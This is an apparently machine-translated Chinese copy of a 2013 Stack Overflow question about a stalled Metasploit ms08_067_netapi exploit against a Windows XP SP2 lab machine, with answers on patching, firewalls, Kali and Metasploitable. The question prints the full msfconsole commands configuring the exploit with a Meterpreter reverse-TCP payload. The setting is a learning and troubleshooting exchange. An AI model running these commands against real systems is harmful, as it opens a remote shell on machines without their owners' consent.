首页
学习
活动
专区
圈层
工具
发布
社区首页 >问答首页 >回溯5 Armitage MSF

回溯5 Armitage MSF
EN

Stack Overflow用户
提问于 2013-12-18 13:36:27
回答 2查看 1.3K关注 0票数 0

我正在学习Metasploit框架,从Armitage开始,以便对结构等有一个大致的了解。我试图黑进一个旧的Windowx sp2,当我试图运行漏洞时,我得到了这样的信息

代码语言:javascript
复制
msf > use exploit/windows/smb/ms08_067_netapi
msf  exploit(ms08_067_netapi) > set LHOST 192.168.18.130
LHOST => 192.168.18.130
msf  exploit(ms08_067_netapi) > set RPORT 445
RPORT => 445
msf  exploit(ms08_067_netapi) > set LPORT 13592
LPORT => 13592
msf  exploit(ms08_067_netapi) > set RHOST 10.0.0.11
RHOST => 10.0.0.11
msf  exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf  exploit(ms08_067_netapi) > set SMBPIPE BROWSER
SMBPIPE => BROWSER
msf  exploit(ms08_067_netapi) > set TARGET 0
TARGET => 0
msf  exploit(ms08_067_netapi) > exploit -j
[*] Exploit running as background job.
[*] Started reverse handler on 192.168.18.130:13592
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP - Service Pack 2 - lang:English
[*] Selected Target: Windows XP SP2 English (AlwaysOn NX)
[*] Attempting to trigger the vulnerability...

我没有得到任何错误,但它在那里停滞,并且不执行利用。

EN

回答 2

Stack Overflow用户

发布于 2013-12-18 13:58:46

因此,看起来漏洞攻击不适用于您已有的Windows版本。也许你可以试试另一个,简单一点的。这些漏洞是什么时候创建的?您是否完全确定在您的Windows版本中它们未打补丁?

如果您想要从运行其他人编写的利用漏洞脚本中学到任何东西,您必须开始调试并尝试了解脚本正在做什么。在脚本显示Attempting to trigger the vulnerability之后,找出它到底在做什么,并尝试找出它可能无法工作的原因。这里有太多的可能性无法推测。

票数 1
EN

Stack Overflow用户

发布于 2013-12-20 00:49:45

我写了阿米蒂奇。以下是一些需要牢记的事情:

  • ms08_067_netapi是针对未打补丁的Windows XP系统的可靠攻击。但是,远程利用漏洞有很多地方可能会出错。尝试重新启动目标系统,并确保基于主机的防火墙已关闭。如果它仍然不能工作,那么很可能你的XP系统已经打了补丁。我注意到了这篇文章的标题,所以这篇文章指的是BackTrack

。在BackTrack Linux上不再支持Armitage。Metasploit框架在2013年4月经历了一次重大的依赖关系转变,打破了BackTrack Linux环境。考虑迁移到Kali Linux。这是BackTrack Linux的后续版本。

谷歌为Kali Linux我没有“声誉”点给你两个以上的链接

  • 是Armitage和Metasploit框架的最佳“第一目标”。这是一个免费的Linux虚拟机,由Metasploit团队提供。它有几个漏洞和错误的配置。可在此处下载:

http://sourceforge.net/projects/metasploitable/files/Metasploitable2/

  • 我写了一篇Armitage入门教程。本教程将带您了解一些针对元可上传虚拟机的攻击:

http://blog.strategiccyber.com/2013/02/06/getting-started-with-armitage-and-the-metasploit-framework-2013/

票数 0
EN
页面原文内容由Stack Overflow提供。腾讯云小微IT领域专用引擎提供翻译支持
原文链接:

https://stackoverflow.com/questions/20650402

复制
相关文章

相似问题

领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档